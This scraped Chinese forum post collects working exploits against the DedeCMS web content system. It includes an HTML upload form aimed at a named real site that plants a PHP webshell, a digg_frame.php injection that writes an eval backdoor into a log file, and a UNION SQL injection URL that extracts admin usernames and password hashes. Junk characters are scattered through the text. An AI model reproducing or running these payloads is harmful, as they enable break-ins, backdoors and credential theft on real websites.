<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
9 o+ R8 c' r2 o/ n/ f</head>7 ?3 i9 H: U2 K7 o! ]
<body style="FONT-SIZE: 9pt">
* p0 A' x) b- V+ U' r5 H---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
1 T) t+ ]% a/ P0 X2 C3 B6 v8 D& v; U8 ~( _<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>; B1 Y$ D( ]# l- j
<input type='hidden' name='activepath' value='/data/cache/' />
( f+ B1 \& l( G- Y! `<input type='hidden' name='cfg_basedir' value='../../' /> m4 ^* t7 d9 \4 G5 Y' O$ z7 H
<input type='hidden' name='cfg_imgtype' value='php' />( R( r8 G& x& K" \5 f1 S: J
<input type='hidden' name='cfg_not_allowall' value='txt' />
& u, `) x5 ]: T8 c- _<input type='hidden' name='cfg_softtype' value='php' />6 M# H8 M: P9 x% ^: ?) q/ ?+ l
<input type='hidden' name='cfg_mediatype' value='php' />8 u, B, |+ ~3 c) T, E- ^
<input type='hidden' name='f' value='form1.enclosure' />3 ?8 Z* v1 J0 M# F; r
<input type='hidden' name='job' value='upload' />" ` b9 M: g3 F& i) j* b0 C
<input type='hidden' name='newname' value='fly.php' />
2 J9 u8 d" i; I- p6 BSelect U Shell <input type='file' name='uploadfile' size='25' />
0 e+ h1 ^! S* {9 o/ b/ ]<input type='submit' name='sb1' value='确定' />. B/ x: `, u% I+ @$ Z/ o' y- J6 u1 ^
</form>
7 j3 e& G; f) _& I! N* ?; U<br />It's just a exp for the bug of Dedecms V55...<br />! M; E; K. H7 T. ^
Need register_globals = on...<br />, \' @( E( p* ?7 a) H% l
Fun the game,get a webshell at /data/cache/fly.php...<br />% Z! o; O" H4 S( t' }, {6 x5 k
</body>( L* W6 L" G' ^+ u! G
</html>
* S, x8 n- {% c$ E. Z9 s; o
/ z7 E$ V( ]' k/ S2 X% [2 f1 t1 W8 o8 _0 x, X0 m. h
& e, c. H* A( K- q4 Q9 b9 D# m+ N7 V i v+ {2 S
+ v8 Q$ }# m6 g a8 N: E
8 B( g# v+ S' C. W; E2 e# B% x% a: @, @$ x3 v/ o) H
& T3 e1 n' Z" p6 f P! F) c$ C3 _7 J1 I6 d
7 J5 e5 f6 t* d9 Y& @
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞8 \, a: K5 i2 u- z6 X
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
( g5 m' o2 q% ^* ]9 i1. 访问网址:
$ n* W5 O; B) \6 W3 B1 Q$ k8 Mhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
- U l4 ]; s; E! s( ]可看见错误信息
7 o/ z( F2 {" u) S1 S3 e* }' x
7 W! K8 o2 e" v* [) \& e% z4 ?7 }/ Z" Y
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
3 n* P* n# z# C5 U0 d5 Kint(3) Error: Illegal double '1024e1024' value found during parsing
: @/ y; j& G3 P7 \& l3 h* e8 E" dError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
( H- d- a) r0 ?. \: g$ j6 O6 H [8 g/ R2 \
) {& l1 Z8 A0 o$ y; d4 Q6 |7 m: c
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是2 q1 ?- j- o: [$ e- J# [) d4 X
; K. i. \- |- m- _ b2 v
# w# M4 u0 A4 O% X<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
5 z* j% r8 b6 o3 ^7 |
, \# g- c- b; X& r' X' O+ @) C
5 y5 e) C7 o L' |# | H按确定后的看到第2步骤的信息表示文件木马上传成功.
3 P) |7 E- G& Y" r
5 `& J9 k+ y& a2 W$ `, D2 {2 q8 ?
6 _' R7 l$ Y1 y7 H# D4 j4 M. k: p) q/ }0 N, k
: b+ V Y4 o) }7 Y1 ]; S9 n: p
1 l8 d4 f+ c- h4 l1 y9 g8 h" ]2 ? ^$ a V# {! y4 D9 j& l5 o! G7 \) U- F
' j& ?$ t D/ R. c+ B
2 P+ K- N) N, l) R3 }. I7 Z0 v A: f1 B
# t# d7 s1 v( e3 w
& @4 K. P! I1 T+ e( `% t/ j. f0 y9 W/ S& Q
织梦(DedeCms)plus/infosearch.php 文件注入漏洞) U3 ]- u) s7 h; t6 i1 f4 t
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对